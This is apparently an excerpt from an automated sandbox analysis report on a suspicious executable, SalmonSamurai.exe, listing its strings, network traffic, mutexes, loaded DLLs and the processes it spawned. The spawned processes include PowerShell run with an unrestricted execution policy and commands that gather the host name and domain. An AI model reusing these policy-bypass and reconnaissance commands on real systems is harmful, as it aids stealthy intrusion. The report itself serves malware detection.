Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggests.go.mail.ru/chrome?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://th.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://th.search.yahoo.com/favicon.icohttps://th.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://th.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://th.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://tr.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://tr.search.yahoo.com/favicon.icohttps://tr.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://tr.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://tw.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://tw.search.yahoo.com/favicon.icohttps://tw.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://tw.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://tw.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://uk.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ve.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ve.search.yahoo.com/favicon.icohttps://ve.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ve.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ve.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://vn.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://vn.search.yahoo.com/favicon.icohttps://vn.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://vn.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://vn.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.amd.com/en/support/apu/amd-series-processors/amd-a8-series-apu-for-laptops/a8-5550m-rade
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ask.com/web?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.baidu.com/#ie=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.baidu.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.baidu.com/favicon.icohttps://www.baidu.com/#ie=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.cisco.com/c/en/us/about/legal/privacy-full.html
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp Binary or memory string: RegisterRawInputDevices() failed for RIDEV_REMOVE

System Summary

Source: C:\Users\user\Desktop\SalmonSamurai.exe File dump: SalmonSamurai.exe.0.dr 160143360
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process Stats: CPU usage > 49%
Source: libEGL.dll.0.dr Static PE information: Number of sections : 11 > 10
Source: libGLESv2.dll.0.dr Static PE information: Number of sections : 11 > 10
Source: SalmonSamurai.exe.0.dr Static PE information: Number of sections : 15 > 10
Source: vk_swiftshader.dll.0.dr Static PE information: Number of sections : 11 > 10
Source: vulkan-1.dll.0.dr Static PE information: Number of sections : 11 > 10
Source: SalmonSamurai.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: powershell.exe, 00000010.00000002.1597653809.0000022B9DB07000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: LC:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g5xmwznm.vbp
Source: classification engine Classification label: mal42.evad.winEXE@77/139@2/2
Source: C:\Users\user\Desktop\SalmonSamurai.exe File created: C:\Users\user\AppData\Roaming\NsisExtracted
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:988:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7724:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7880:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2384:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7992:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2552:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7976:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4308:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7800:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7752:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6536:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7912:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:608:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6924:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7368:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7532:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5880:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3268:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3672:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1748:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5632:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6796:120:WilError_03
Source: C:\Users\user\Desktop\SalmonSamurai.exe File created: C:\Users\user~1\AppData\Local\Temp\nseC67A.tmp
Source: SalmonSamurai.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SalmonSamurai.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\SalmonSamurai.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: SalmonSamurai.exe ReversingLabs: Detection: 30%
Source: C:\Users\user\Desktop\SalmonSamurai.exe File read: C:\Users\user\Desktop\SalmonSamurai.exe
Source: unknown Process created: C:\Users\user\Desktop\SalmonSamurai.exe "C:\Users\user\Desktop\SalmonSamurai.exe"
Source: C:\Users\user\Desktop\SalmonSamurai.exe Process created: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "chcp"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process created: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe "C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\jwsvgxfvwjmqrcpj" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1876 --field-trial-handle=1880,i,15145349905325196454,8933157076268643117,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process created: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe "C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\jwsvgxfvwjmqrcpj" --mojo-platform-channel-handle=2076 --field-trial-handle=1880,i,15145349905325196454,8933157076268643117,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "findstr /C:"Detected boot environment" "%windir%\Panther\setupact.log""
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log"
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SalmonSamurai.exe Process created: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "chcp"
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process created: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe "C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\jwsvgxfvwjmqrcpj" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1876 --field-trial-handle=1880,i,15145349905325196454,8933157076268643117,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process created: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe "C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\jwsvgxfvwjmqrcpj" --mojo-platform-channel-handle=2076 --field-trial-handle=1880,i,15145349905325196454,8933157076268643117,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "findstr /C:"Detected boot environment" "%windir%\Panther\setupact.log""
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log"
Source: C:\Users\user\Desktop\SalmonSamurai.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exe Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exe Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exe Section loaded: iconcodecservice.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: uiautomationcore.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: kbdus.dll
